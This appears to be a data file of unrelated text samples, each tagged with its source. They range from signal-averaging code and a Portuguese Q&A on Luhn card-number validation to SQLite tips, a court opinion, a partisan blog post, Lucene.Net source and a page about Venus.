odd_average=sum(NOISE_TRIALS(1:2:sz,:))/(sz/2);
even_average=sum(NOISE_TRIALS(2:2:sz,:))/(sz/2);
noise_estimate=odd_average-even_average;
% create plot
figure
hold on
plot(NOISE_TRIALS(1,:),'g')
plot(noise_estimate,'k')
plot(average,'r')
plot(S)
hold off
xlabel('Trials')
ylabel('Amplitude')
title('Signal Averaging')
legend('Single trial', 'Noise estimate', 'Averaged Signal','Signal')
The averaging process above, and in general, results in an estimate of the signal. When compared with the raw trace, the averaged noise component is reduced with every averaged trial. When averaging real signals, the underlying component may not always be as clear, resulting in repeated averages in a search for consistent components in two or three replicates. It is unlikely that two or more consistent results will be produced by chance alone.
Correlated Noise
Signal averaging typically relies heavily on the assumption that the noise component of a signal is random, having zero mean, and being unrelated to the signal. However, there are instances in which the noise is not uncorrelated. A common example of correlated noise is a hum (e.g. 50 or 60 Hz noise originating from power lines). To apply the signal averaging technique, a few critical adaptations must be made, and the problem can be avoided by:
Randomizing the stimulus interval, or
Using a noninteger stimulus rate (e.g. 3.4 Hz instead of 3.0 Hz)
References
Category:Digital signal processing
Averaging
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Q:
Validar número Cartão de crédito
Como faço para validar números de cartões de crédito?
Não farei integração com operadora de cartão, preciso apenas validar o número, assim como ocorre com a validação com CPF.
A:
Você pode utilizar o atributo CreditCardAttribute para validar. Como está utilizando asp.net-mvc-5 creio que já está familiarizado com o Data Annotations. Ele possui um atributo chamado [CreditCard], que você pode utilizar para esse fim. Para utilizar o mesmo basta fazer a marcação em sua propriedade da seguinte forma:
[CreditCard(ErrorMessage = "Cartão de crédito inválido")]
public string CartaoCredito { get; set; }
Nesta resposta você conseguirá ver mais detalhado.
Você pode implementar seus próprios atributos ou métodos para validar, caso deseje.
Alguns links para ajudar:
Credit Card Validation Client Asp.Net.
Credit Card Attribute.
A:
A validação de números de cartão de crédito normalmente é feita pelo algoritmo de Luhn:
Retire o último dígito do número. Ele é o verificador;
Escreva os números na ordem inversa;
Multiplique os dígitos das casas ímpares por 2 e subtraia 9 de todos os resultados maiores que 9;
Some todos os números;
O dígito verificador (aquele do passo 1) é o número que você precisa somar a todos os outros números somados pra obter um módulo 10.
Exemplo
Passo Total
Número Original : 4 5 5 6 7 3 7 5 8 6 8 9 9 8 5 5
Tirando o último dígito : 4 5 5 6 7 3 7 5 8 6 8 9 9 8 5
Invertendo : 5 8 9 9 8 6 8 5 7 3 7 6 5 5 4
Multiplicando casas ímpares por 2 : 10 8 18 9 16 6 16 5 14 3 14 6 10 5 8
Subtraia 9 de todos os números acima de 9: 1 8 9 9 7 6 7 5 5 3 5 6 1 5 8
Somando todos os números : 1 8 9 9 7 6 7 5 5 3 5 6 1 5 8 85
Mod 10: 85, módulo 10 = 5 (último dígito do cartão)
Formatos de Operadoras Conhecidas
Bandeira Intervalo de Início Número de Dígitos
-----------------------------------------------------------------------------
American Express 34, 37 15
Diners Club - Carte Blanche 300, 301, 302, 303, 304, 305 14
Diners Club - International 36 14
Diners Club - USA & Canada 54 16
Discover 6011, 622126 até 622925, 644, 16
645, 646, 647, 648, 649, 65
InstaPayment 637, 638, 639 16
JCB 3528 até 3589 16
Laser 6304, 6706, 6771, 6709 16-19
Maestro 5018, 5020, 5038, 5893, 6304, 16-19
6759, 6761, 6762, 6763
MasterCard 51, 52, 53, 54, 55 16-19
Visa 4 13-16
Visa Electron 4026, 417500, 4508, 4844, 4913, 16
4917
Tirei daqui.
No ASP.NET MVC
Por atributo, conforme a resposta do @Randrade.
A:
O Algoritmo utilizado para calcular o digito de verificação (Check Digit) de Números de Cartão de Crédito é o Algoritmo de Luhn, porém não basta apenas validar a informação sem levar em conta as características de um número de Cartão de Crédito que são:
Possuir somente números
Ter entre 12 e 19 dígitos (na verdade não há CC com 17 dígitos)
Os 6 primeiros dígitos devem indicar um IIN (Issuer identification number) válido. Ele é chamado de BIN no meio bancário.
Passar na validação do Algoritmo de Luhnn
A verificação do item BIN necessita de uma base de informações para comparação. Não existe uma lógica na geração dos BINs. Você pode ter faixas por exemplo que tem saltos e dentro destes saltos o BIN pertecer a uma instituição diferente, inclusive de país diferente.
É um clássico erro acreditar que todo cartão que comece com 4 é VISA e com 5 seja Mastercard, por exemplo. Atualmente no Brasil isso é até válido, pois temos poucas empresas de Cartão o que acaba reservando o 4 e o 5 apenas para estas duas Bandeiras.
Deixando estes aspectos de lado, pois não há como validar um BIN via código sem que seja feita algum tipo de consulta, a validação pode ser feita com o seguinte algoritmo
Verificar se o tamanho do numero do cartão está entre 12 e 19. Atualmente no Brasil é raro ter um cartão diferente de 16. Alguns Hipercard tinham 19 mas já estão saindo com 16 também.
Verificar se o valor possui somente números
Verificar se o número passa pela validação do Algoritmo de Luhnn
Abaixo um código em C#. Ele é apenas uma forma de entender pois já há nas versões atuais do ASP.net, validação por Attributes para esta verificação, conforme resposta do @Randrade
O Algoritmo de Luhnn está representado na resposta do @Cigano Morrison Mendez com a ressalva que na última linha, onde está
Mod 10: 85, módulo 10 = 5 (último dígito do cartão)
Deveria estar
Mod 10: 85, módulo 10 = 5, Check Digit = 10 - 5 = 5 (último dígito da sequencia)
Na verdade, não há a necessidade de calcular o check digit. Basta incluir o termo na soma e calcular o módulo 10 dela. Se for zero é válido.
// About the Algorithm
/**
@See https://en.wikipedia.org/wiki/Luhn_algorithm
Steps:
1 - From the rightmost Digit of a Numeric String, Double the value of every digit on odd positions
2 - If the obtained value is greather than 9, subtract 9 from it
3 - Sum all values
4 - Calculate the Modulus of the value on 10 basis, if is zero so the String has a Luhnn Check Valid
**/
public static bool IsValidLuhnn(string val) {
int currentDigit;
int valSum = 0;
int currentProcNum = 0;
for (int i = val.Length-1; i >= 0; i--) {
//parse to int the current rightmost digit, if fail return false (not-valid id)
if(!int.TryParse(val.Substring(i,1), out currentDigit))
return false ;
currentProcNum = currentDigit << (1 +i & 1);
//summarize the processed digits
valSum += (currentProcNum > 9 ? currentProcNum - 9 : currentProcNum);
}
// if digits sum is exactly divisible by 10, return true (valid), else false (not-valid)
// valSum must be greater than zero to avoid validate 0000000...00 value
return (valSum > 0 && valSum % 10 == 0) ;
}
public static bool isValidCreditCardNumber(string cc) {
// rule #1, must be only numbers
if (cc.All(Char.IsDigit) == false) {
return false;
}
// rule #2, must have at least 12 and max of 19 digits
if (12 > cc.Length || cc.Length > 19) {
return false;
}
// rule #3, must pass Luhnn Algorithm
return IsValidLuhnn(cc);
}
Pode ser testado aqui
|
{
"pile_set_name": "StackExchange"
}
|
News and Reviews from the Education Library Service
CILIP Carnegie Medal and Kate Greenaway Prize 2014
On Monday afternoon the winners of the 2014 CILIP Carnegie Medal and Kate Greenaway Prize were announced, delivered to Kevin Brooks’ ‘The Bunker Diary’ and Jon Klassen’s ‘This Is Not My Hat’ respectively. While the latter seemed an almost logical choice- an illustrator whose work is greatly loved in our office- the awarding of the top prize to Kevin Brooks has been controversial, with the win garnering much attention in the national press. Much of the debate has surrounded the book’s gritty content and indeed its suitability in a text aimed at a young audience. That said, many of the nominated titles this year seemed to have a dark undertone, with perhaps ‘Liar & Spy’ and ‘Rooftoppers’ falling outside of this bracket.
The “darkness” of the shortlist was an issue raised at the shadowing session we attended on Monday morning. Taking place in the wonderful library at Litcham School, a group of year 9 students were joined by visiting pupils from Long Stratton High, all of whom had taken part in the shadowing scheme this year. After a brief quiz in which they were tested on their knowledge of the books selected for this year’s lists, the students were put into small groups and each of the titles were discussed. We were so impressed with the quality of their responses and the students had evidently thought hard about why they liked (or indeed, disliked!) each of the books.
The content of discussion was vast and ranged from how misleading a book cover can often be (in particular, the variations between the paperback and hardback covers of ‘The Child’s Elephant’) to the significance of centering a story around real life social, political and cultural history (‘Ghost Hawk’ and ‘The Wall’). The students’ impassioned reactions were brilliant to see and hear and we’d like to thank the pupils of Litcham School and Long Stratton High for sharing with us their thoughts!
To mirror the real announcements taking place in London, the students each cast a vote on which of the titles they would pick to win and the results were as follows:
The Wall by William Sutcliffe: 5 votes
Rooftoppers by Katherine Rundell: 4 votes
The Bunker Diary by Kevin Brooks: 3 votes
All The Truth That’s In Me by Julie Berry: 2 votes
The Child’s Elephant by Rachel Campbell-Johnston: 2 votes
Blood Family by Anne Fine: 2 votes
Ghost Hawk by Susan Cooper: 1 vote
Liar & Spy by Rebecca Stead: 0 votes
We were pleasantly surprised to see ‘The Wall’ come out on top and were even more impressed with how many of the students present mentioned the way in which the story had made them want to familiarise themselves further with the Israeli-Palestine conflict on which the story is based. The results of our poll were also interesting when compared to how we in the office had ranked the books: Julie Berry’s ‘All The Truth That’s In Me’ was our favourite to win, with ‘The Bunker Diary’ largely disliked.
The groups of students also looked at the Kate Greenaway titles and the vote for this was unanimous: ‘The Day the Crayons Quit’ by Drew Daywalt and Oliver Jeffers! However it was agreed that Jon Klassen’s work in both the Lemony Snickett collaboration ‘The Dark’ and in his own right (‘This Is Not My Hat’) would be worthy of any award, so his win came as no surprise!
Overall, we had such a wonderful morning and are already looking toward next year’s awards: what’s next for Carnegie?
Below are extracts from two of the reviews written by students from Litcham- we thought they were so great that they deserved to be shared!
Of Anne Fine’s ‘Blood Family’, Hannah wrote:
‘Despite the depressing subject matter, I really enjoyed Blood Family because I felt the storyline was very true to life and believable. This tale of an adopted child in a caring family made me realise how hard it is to live life to the full when you have a looming shadow of your horrific past hovering over you day and night.
I thought the book well written and easy to read and I couldn’t put it down. I particularly like the way the story was written from the perspective of different people so you can see how Eddie’s life and traumas impact on other people’s lives, and how they perceive what is going on.’
On ‘The Wall’, Eleanor wrote:
‘I found it both an adventurous and thrilling book. I thought it had an original story line and I liked the fact that it is based on something that us really happening now and so combines fact with fiction. I’ve learnt a lot from reading this book on a subject I didn’t know a lot about.
I loved the fact that the story is written through the innocent eyes of thirteen year old Joshua. I liked him as a character because he wasn’t afraid to stand up for what he thought was right and to help other people who he was told didn’t deserve it. he matured through the book from a boy who was kept in the dark to a man who wasn’t afraid to make his own decisions.’
What are your thoughts on this year’s winners? We’d love to know- we can’t stop talking about here!
One thought on “CILIP Carnegie Medal and Kate Greenaway Prize 2014”
[…] As a reminder, the shortlist can be found here and we also recommend having a look at the shadowing site on which schools and reading groups across the country have been sharing what they think of the nominated books. We’ll be hosting a special event on the day the winner will be announced (22nd June!) and we look forward to sharing what the pupils discussed at our meeting. You can find a round-up of our 2014 shadowing morning here. […]
|
{
"pile_set_name": "Pile-CC"
}
|
1 Post-Hackathon Report
This page is for listing what was done during the Hackathon. Please add a short description of what you worked on, with links to relevant blog posts, hackage packages, commits, etc.
1.1 fclabels 1.0 release
New release of the fclabels package. The new package has a lot of code and documentation cleanups, support for partial labels in the case of multi-constructor datatypes and is about 20x as fast for setting and modifying as the previous version. Thanks everyone for helping me out!
1.2 GHC and base library improvements
Add unchecked left and right bit shifts: The Data.Bits.shift method uses a branch to check if the shift amount is larger than the word size and returns 0 in these cases. This extra safety makes performance worse in bit twiddling code.
1.3 Context synonym families
Started working on context synonym families and indexed context synonym families. We make this work by giving evidence the new kind Fact, and then allowing any type of kind Fact to appear on the left of a => arrow.
1.14 TagSoup/Derive/HLint
All the above packages got upgraded to the latest GHC, along with a few bug fixes (Derive now deals with singleton constructors with no fields, HLint now supports an ANSI CPP flag) (Neil Mitchell)
1.15 Hoogle
The current Hoogle parser for user queries is old, doesn't parse everything correctly, and in particular doesn't deal well with partial queries (when the user is still typing their search). We discussed lots of edge cases, and started implementing a new version (Jacek Generowicz, with guidance from Neil Mitchell)
1.16 CmdArgs
The CmdArgs package lets you concisely specific command line arguments. I ported the package to GHC 7.2.1, did some cleanups, and fixed some bugs (you can now use Int64 etc). I then started working on two new features: 1) Given a CmdArgs program (such as Hoogle) you can specify you want to enter the arguments via a GUI hosted in the web browser. Currently the GUI is a simple textbox with realtime validation, but in future it will become a structured command line argument editor based on the options to your tool. 2) Adding automatic bash autocompletion - some of the work has been done, but the details are not yet finished. (Neil Mitchell)
1.17 Hackage server
Further refactoring work, simplification of HTTP basic/digest authentication code. Started work on serving package changelogs. Improvements to admin pages to make various features more discoverable (Duncan Coutts, Stefan Wehr, Ben Millwood).
Hackathon branch of the code is at (not all patches have been submitted yet):
1.18 Bittorrent DHT
Initial work on implementing BEP 0005 in Haskell. Some core data structures seem to be working (although untested) and I'm currently working on the protocol. I will probably merge this into Haskell Torrent when everything is working, but I intend to keep the library available separately as I see potential uses for the network other than Bittorrent. (Alex Horsman)
1.21 Haskell Test Framework (HTF)
New '--quiet' flag: only produces output for failing tests (FINISHED)
Output a diff if an assertEqual fails (not yet finished)
1.22 Stack traces in GHC
I (Simon M.) was working on adding better support for source code annotations in GHC's Core language, and unifying the way we handle profiling cost centres, coverage annotations, and breakpoints in the GHCi debugger. I'm working on a new semantics for cost centre stacks, which will allow us to track call stacks at runtime. This will not only give us more accurate profiling, but also let us report stack traces on errors (e.g. head []), perhaps enabled by a compile-time option.
1.23 TLS
lots of various misc improvements: re-work records for more type safety, support for compression, initial support of version 1.2. (Vincent Hanquez)
1.26 Data.ByteString.Lazy.Builder
Duncan Coutts and Johan Tibell reviewed my (Simon Meier) work on a lazy bytestring builder for the 'bytestring' library; based on blaze-builder. The API and implementation is now complete. Documentation is there, but needs lots of polishing. I also gave a talk on when and how to use the bytestring builder. The slides and example code are available from github.
1.27 Error reporting for JsonGrammar
Some progress on better error reporting for the JSON conversion functions in the JsonGrammar package was made. Now
fromJson
no longer says
Nothing
when there is an error in the input JSON. Progress can be tracked on GitHub. When finished it will be merged back into the master branch and released in a new version on hackage. (Martijn van Steenbergen)
At Hasckathon, I extended the GHC lexer & parser and added a language extension flag
DocaseNotation
. I also understood a little bit how type-checker and desugaring works and I got a very basic part of the extension to work (one particular part of syntax type-checks and desugars to Prelude function call, but it supports re-bindable syntax as other similar extensions). I continue working on the extension and will upload a patch for more discussion when it's ready.
|
{
"pile_set_name": "Pile-CC"
}
|
It is known in art to control access to a device via arbitration. In a typical system-on-chip (SoC), a system resource, such as a memory or peripherial, is shared by multiple accessors. In the field of this invention requesting devices typically have priorities relative to other requesting devices. The device with the higher priority is granted access. In many systems this priority is dynamically allocated. For example, the last requester to be granted access may be given the highest priority. On the other hand, priority may be statically assigned to permit a high priority requester to have its needed access. One of these may be given ultra high priority, meaning that the arbiter always gives this accessor priority over all others. In this case some control over the grant and masking of the ultra high priority request is typical to meet the bandwidth requirements of the ultra high priority accessor as well as for all the remaining accessors.
A common solution to this problem is periodically allocating a time slot for the ultra high priority requester. During this time period, no other requester is granted access to the resource. However, such a scheme is sensitive to the time alignment of the request and thus may not help in meeting the real time requirements. For the same reason, it may also waste bandwidth for the remaining requesters. Other solutions grant access to the ultra high priority accessor each time another requester completes one access. Thus the ultra high priority requester is sure to get access on a regular basis. This may not be sufficient to meet the real time requirements of the high priority requester and it may hurt the bandwidth requirements of other accessors. However, the user does not have control over resource allocation in both the above cases.
Thus there is a need in the art for a flexible scheme to control arbitration to allocate accesses to a shared resource by plural requesting devices.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
21. Using null values with your databases. SQL databases have a concept of a NULL value which indicates that there is not a value in that column. NULL is different than an empty string '' or a 0, since these are both actual values.
One thing to remember about nulls is that two nulls are not alike since they do not actually contain a value. This means that null does not equal null. It is almost like each null value is a separate instance of a class, they may look the same but they don't compare.
A common mistake is to treat nulls like any other value in SQL:
select * from people where pet = null
This will not return any results, even if there are null values in the pet column, because of the note above. The null value contained in the pet column is not the same as the literal null value in the SQL. In order to check to see if the value is a null value, then you have to use the IS NULL operator. Going back to the class reference, this is like using the ISA operator on a class in REALbasic:
select * from people where pet is null
To get values where the value is not a null value then you can use the opposite:
select * from people where pet is not null
Now, you have your data in a RecordSet class, but you need to check to see if the value is null or assign to it. The DatabaseField.Value (you get a DatabaseField from RecordSet.IdxField or RecordSet.Field) property returns a variant that holds the value in the field. The Variant class has an IsNull property which allows you to determine if the value is null or set the value to null.
When inserting a record with the DatabaseRecord class, if you want to insert a null value, then you can just leave that value out of the DatabaseRecord and the engine will use the default value for that column, which is null unless otherwise specified in the schema.
22. I've seen a number of people looking to move data from a physicaly database to an in-memory database, or the reverse. Here are two functions which copy the contents of a REALSQLDatabase to an In-Memory database and also the reverse going back out to disk, no matter what the schema is:
Function CopyToDisk(extends memdb as realSQLDatabase, file as folderItem) Asboolean// Copy the contents of an in-memory database to disk
These functions could be modified to take an array of table names if you want to only copy over specific tables. These functions do not transfer over indexes, triggers, etc, but that would not be difficult to add. You can get the sql command for those in the same manner that the table sql is retrieved.
23. REALbasic and REAL Server both use the SQLite database engine. Often times people want to know which specific version of the SQLite engine is included with certain releases. To find this out connect to your database and run the following SQL command:
24. Tip 10 shows a very basic way to add data into a SQL command with the ReplaceAll function, however this can be problematic. If the string being placed into the SQL command has a similar placeholder (?2) then you could end up with corrupt data in your SQL command.
Here are a couple functions that will give you a nicer syntax and prevent these types of problems:
ProtectedFunction BindSQLData(sql asstring, values() asstring) Asstring// Bind data into a SQL command in place identified by a question mark placeholder '?'. The// placeholder can either be enclosed in quotes or not.// The data can either be provided as a single array or multiple parameters to the function.// A value of chr(0) will be set to null in the SQL command.
// Now loop through all the chunks and add in the data.dim i, dataIdx asintegerfor i = 0to ubound( chunks )// Get the next chunk of datadim chunk asstring = chunks(i)dim nextChar asstring = left( chunk, 1 )
// Get the data value to bind in this position.dim value asstringif i > 0then// Skip the first chunk since there isn't a value preceeding the statement value = "null"// Default to null if there is no data.
if dataIdx <= ubound( values ) then// Make sure we have data for this chunk value = values( dataIdx )
// Add the new data to the sql command result = result + value + chunknext
return resultEndFunction
To uses these functions you simply write your SQL command with a question mark in places where the data will be placed, then you call the BindSQLData function with either an array of values or a param array. For example:
|
{
"pile_set_name": "Pile-CC"
}
|
Peer mentoring is associated with positive change in physical activity and aerobic fitness of grades 4, 5, and 6 students in the heart healthy kids program.
Only 7% of Canadian children achieve activity recommendations, contributing to obesity and preventable disease. The Heart Healthy Kids (H2K) program was designed to test the relationship between peer mentoring, physical activity, and cardiovascular fitness. Participants from 10 schools (5 control, 5 intervention) were enrolled in the program. In control schools, H2K included a physical activity challenge and education sessions. Intervention schools included the addition of a peer-mentoring component. Physical activity was measured through daily pedometer recording. Cardiovascular fitness was evaluated using the PACER (Progressive Aerobic Cardiovascular Endurance Run) protocol to calculate maximal oxygen uptake (VO2 max). Participants included 808 children (average age 9.9 ± 1.0 years). Although control and intervention schools did not differ at baseline, participants with peer mentoring logged significantly more steps per school day, on average, than those in control schools (6,785 ± 3,011 vs. 5,630 ± 2,586; p < .001). Male participants logged significantly more steps per school day than female participants. A significant improvement in VO2 max was also noted in intervention schools, with an average increase of 1.72 ml/mg/min. H2K was associated with positive change in physical activity and cardiovascular fitness, suggesting that peer mentoring shows promise for application in health promotion interventions.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
712 S.W.2d 94 (1986)
Rheda B. VAN CLEAVE, Appellant,
v.
McKEE BAKING COMPANY, Appellee.
Supreme Court of Tennessee, at Knoxville.
June 2, 1986.
Douglas M. Campbell, Campbell & Campbell, Chattanooga, for appellant.
Gary S. Napolitan, Leitner, Warner, Moffitt, Williams, Dooley, Carpenter & Napolitan, William H. Pickering, Chambliss, Bahner, Crutchfield, Gaston & Irvine, Chattanooga, for appellee.
OPINION
PER CURIAM.
In this worker's compensation action, the chancellor found that Rheda B. Van Cleave *95 sustained an injury to his back in an on-the-job accident on November 10, 1981. The chancellor further found that the plaintiff sustained no permanent disability from the injury, and that all benefits due the plaintiff for his temporary disability had been paid, except for certain enumerated medical expenses. A judgment then was entered ordering the employer to pay the medical expenses and dismissing plaintiff's claim for permanent disability benefits. Plaintiff insists that the chancellor erred in failing to award permanent disability benefits, and in failing to require the defendant to pay the medical bill submitted by Dr. George Shelton. On reviewing the record, we find material evidence to sustain the chancellor's findings on both issues. Accordingly, we affirm the judgment.
Neither party now questions the fact that plaintiff injured his back in a fall, or near fall, which occurred on November 10, 1981, when plaintiff stepped from a platform into a truck while carrying one end of a frame he had painted in the course of his employment by McKee Baking Company. We see no need to detail the treatment plaintiff underwent for his injury. Suffice it to say that plaintiff was given medical treatment over a period of several weeks, and was hospitalized for examination and a series of tests. Two of the three doctors who testified expressed the opinion that plaintiff did not sustain any permanent disability as the result of the November 10, 1981, accident. They also testified that the symptoms complained of by Mr. Van Cleave were due to diabetic neuropathy, a disease of the central nervous system, and that it was not caused or aggravated by Mr. Van Cleave's industrial accident. They further testified that plaintiff had recovered from his traumatic injury prior to his examination by Dr. Shelton in November, 1983.
In reviewing a decision in a worker's compensation action predicated upon an injury that occurred prior to July 1, 1985, this court does not weigh evidence, nor decide the credibility of witnesses. Those are issues for the trial judge. Liberty Mutual Insurance Co. v. Taylor, 590 S.W.2d 920 (Tenn. 1979). The review by this court is limited to the determination of whether there is any material evidence in the record to support the findings of the trial judge. If so, we are bound to accept them. Kingsport Press, Inc. v. Van Huss, 547 S.W.2d 572 (Tenn. 1977); Davis v. Gulf Ins. Group, 546 S.W.2d 583 (Tenn. 1977). Under the review allowed this court, the medical testimony referred to is sufficient to support the chancellor's findings on both the issue of disability and the denial of medical expenses incurred by plaintiff after he had recovered from his on-the-job injury.
Appellee has asked that we impose a frivolous appeal penalty upon appellant. On consideration of the motion and the record, we decline to do so.
The record also shows that plaintiff amended his worker's compensation action to include a claim for damages for retaliatory discharge. The claim was dismissed by the chancellor on his finding that it was barred by the one year limitation on tort actions. T.C.A. § 28-3-104. Plaintiff has assigned this action as error. A claim for damages for retaliatory discharge is not a part of a worker's compensation claim, but is a separate tort action. Jurisdiction of an appeal in a tort action lies in the Court of Appeals, not this court. See T.C.A. § 16-4-108. Accordingly, the appeal of the dismissal of the claim for damages for retaliatory discharge must be transferred to the Court of Appeals for its consideration and decision.
The judgment of the trial court in the worker's compensation action is affirmed, and the cause is remanded for enforcement of the judgment. The appeal of the claim for damages for retaliatory discharge is transferred to the Court of Appeals. Costs incurred in appealing the action to this court are adjudged against the plaintiff and his surety.
BROCK, C.J., not participating.
|
{
"pile_set_name": "FreeLaw"
}
|
How Do We Defeat Terrorism? According to Loretta Lynch: Compassion, Unity And Love
It’s not demoralizing enough that Obama’s own staff has repeatedly given honest, realistic and discouraging assessments of how the Obama administration is losing our fight with ISIS and related terrorist groups and individuals, which assessments are one-hundred-eighty degrees out of phase from the lying, dreamy, pleasant descriptions that Obama himself gives of how he has dealt with this very serious issue and how we are supposedly winning against our enemies. But now we have evidence, from the mouth of Obama’s Attorney General, Loretta Lynch, that we will use dope-smoking, hippy thinking to defeat the enemy that has sworn to kill us. She says that the way to ward off more Orlando-style terrorist attacks is to use “compassion, unity and love”. No dope-smoker could have stated Obama-reality better.
How nuts must someone be to suggest that the way to defeat terrorism and make America and the world safe is to exercise “compassion, unity and love”? This type of statement is a slap in the face of the victims of the Orlando attack, to suggest that we haven’t been nice enough and to place blame for this failing on the part of the people who were simply enjoying themselves in the Orlando night club until an Islamic hate monger killed them. What the hell kind of people are the fools in the Obama administration?
So let’s see how the Attorney General’s plan would work: Instead of using technology and proven police work to halt crimes and gather evidence to convict law breakers, are we now going to depend on love and the chanting of mantras to stop them? This would suggest that prior to Orlando we were not “loving” enough, but now we are suddenly awash with love and no more crimes will be committed? So why was the Obama administration lacking in love until just now? Oh, I remember: he has been too busy “fundamentally transforming America” to be loving. He was spending all of his time undermining the nation’s economy and dividing the population along economic, sexual identity and racial lines, but now he’s ready to feel the love. Yeah, right.
Can the American people soon expect that counterfeiters, bank robbers and kidnappers will be encouraged to halt their illegal ways via compassion and love instead of being finger printed and DNA tested? Will Obama demand that the fence and the walls surrounding the White House be taken down due to his new-found love and compassion as a means to ward off evil and discourage bad guys?
One phrase that Ms. Lynch did not use in addition to the newly concocted words of compassion, unity and love that will solve all of the nation’s problems, was “turn the other cheek”. But we can’t use that phrase because it sounds too Christian, and we can’t have these crazy Christians running around verbally “attacking” everyone with Bibles, crucifixes and words of love. No, it’s better to quote a nut-job like John Lennon rather than Christ. The old 1960s songs “All we need is love” and “What the world needs now is love sweet love” come to mind with Lynch’s idiotic statements. But the Attorney General’s naïve, superior attitude is not encouraging.
I assume we’ll now have the IRS using love to convince conservatives not to try to get tax exemption for their groups to compete with liberal Democrats, instead of using the threat of imprisonment and fines to keep them out of the game of politics. And maybe Lois Lerner can be brought back to lead the IRS in this new direction, but she never appeared to be much of a “love” person to me.
Poor Loretta Lynch. Last week she was forced to state the policy of redacting any hateful Islamic language and phrasing found in the transcript recently released of the words used by the Orlando killer as he was attacking the night club. But the outcry to this stupidity was so great that the government soon released the entire screed. Then she is forced to claim to be using passive, non-violent, Gandhi-like thinking to halt crime. I believe that it’s obvious at this point: we have a dangerous, anti-American bunch of fools in the White House, and we’re in deep trouble if we don’t get them out of there real soon.
And of course Ms. Lynch added insult to injury when she vacuously stated that we may never know the motivation of the Orlando killer. Sadly, everyone except Lynch and Obama know exactly what the motivation was: jihad and the killing of Americans. The words spoken by the killer proved his love for ISIS and his desire to eliminate America as an influence in the world.
About Dave King
2 comments
Makes me want to run to the nearest Mosque and give ’em all a big hug and sloppy kiss…..I used to think ‘they’ would change their minds if all of these ‘unwanted’ and dangerous people moved into their house, but figure since both want to destroy the USA and have Sharia, they’d get along just fine….so I openly declare and identify ALL of America’s enemies…..
|
{
"pile_set_name": "Pile-CC"
}
|
using YAF.Lucene.Net.QueryParsers.Flexible.Core.Builders;
using YAF.Lucene.Net.QueryParsers.Flexible.Core.Nodes;
using YAF.Lucene.Net.QueryParsers.Flexible.Standard.Nodes;
using YAF.Lucene.Net.Search;
namespace YAF.Lucene.Net.QueryParsers.Flexible.Standard.Builders
{
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/// <summary>
/// This query tree builder only defines the necessary map to build a
/// <see cref="Query"/> tree object. It should be used to generate a <see cref="Query"/> tree
/// object from a query node tree processed by a
/// <see cref="Processors.StandardQueryNodeProcessorPipeline"/>.
/// </summary>
/// <seealso cref="QueryTreeBuilder"/>
/// <seealso cref="Processors.StandardQueryNodeProcessorPipeline"/>
public class StandardQueryTreeBuilder : QueryTreeBuilder<Query>, IStandardQueryBuilder
{
public StandardQueryTreeBuilder()
{
SetBuilder(typeof(GroupQueryNode), new GroupQueryNodeBuilder());
SetBuilder(typeof(FieldQueryNode), new FieldQueryNodeBuilder());
SetBuilder(typeof(BooleanQueryNode), new BooleanQueryNodeBuilder());
SetBuilder(typeof(FuzzyQueryNode), new FuzzyQueryNodeBuilder());
SetBuilder(typeof(NumericQueryNode), new DummyQueryNodeBuilder());
SetBuilder(typeof(NumericRangeQueryNode), new NumericRangeQueryNodeBuilder());
SetBuilder(typeof(BoostQueryNode), new BoostQueryNodeBuilder());
SetBuilder(typeof(ModifierQueryNode), new ModifierQueryNodeBuilder());
SetBuilder(typeof(WildcardQueryNode), new WildcardQueryNodeBuilder());
SetBuilder(typeof(TokenizedPhraseQueryNode), new PhraseQueryNodeBuilder());
SetBuilder(typeof(MatchNoDocsQueryNode), new MatchNoDocsQueryNodeBuilder());
SetBuilder(typeof(PrefixWildcardQueryNode),
new PrefixWildcardQueryNodeBuilder());
SetBuilder(typeof(TermRangeQueryNode), new TermRangeQueryNodeBuilder());
SetBuilder(typeof(RegexpQueryNode), new RegexpQueryNodeBuilder());
SetBuilder(typeof(SlopQueryNode), new SlopQueryNodeBuilder());
SetBuilder(typeof(StandardBooleanQueryNode),
new StandardBooleanQueryNodeBuilder());
SetBuilder(typeof(MultiPhraseQueryNode), new MultiPhraseQueryNodeBuilder());
SetBuilder(typeof(MatchAllDocsQueryNode), new MatchAllDocsQueryNodeBuilder());
}
public override Query Build(IQueryNode queryNode)
{
return base.Build(queryNode);
}
}
}
|
{
"pile_set_name": "Github"
}
|
Venus
Venus is the second planet from the Sun and the sixth largest planet in our Solar System. Due to its proximity to Earth it is the brightest planet in our night sky and so was discovered very early on. It appears brightest just after sunset and just before sunrise, and so is sometimes known as the “Evening Star” or the “Morning Star”. Venus is named after the Roman goddess of love and beauty.
It takes Venus 225 of our Earth days to complete one very regular orbit around the Sun. Venus itself rotates very slowly, so one day on Venus is about as long as 117 Earth days. Venus rotates in retrograde. This is the opposite direction of most planets including Earth, so from Venus the Sun would appear to rise in the west and set in the east. Venus has no satellites.
Venus is surrounded by a thick, toxic atmosphere consisting of mostly carbon dioxide. Clouds of sulphuric acid create an extreme greenhouse effect around the planet, and obscure its surface from view. The surface pressure of the atmosphere is very high, 90 times more than the Earth’s atmospheric pressure. The temperature on Venus is around 740 K (466°C), hot enough to melt lead.
Venus is very similar in size and structure to Earth. It is mostly a desert surface covered in thousands of mountains and volcanoes. Venus’ largest mountain, Maxwell Montes, is similar in size to Mount Everest on Earth. There is evidence that oceans existed on Venus, but the intense heat from the Sun caused them all to boil away. The lack of a magnetic field around Venus meant the hydrogen in the water could have been swept into space by solar wind.
More than 20 spacecraft have been to Venus, employing radar or infrared to map the surface of the planet through its thick clouds. In 1970 Venera 7 became the first spacecraft to land on another planet when it touched down on the surface of Venus. However, the extreme heat is difficult to endure for long periods of time, so only 23 minutes of data could be collected.
Share this with the Universe!
Venus Gallery
Planet venus with colourised clouds
Eistla regio with Gula Mons on the horizon
3D Image of Gula Mons volcano on planet Venus
UV light image of planet Venus
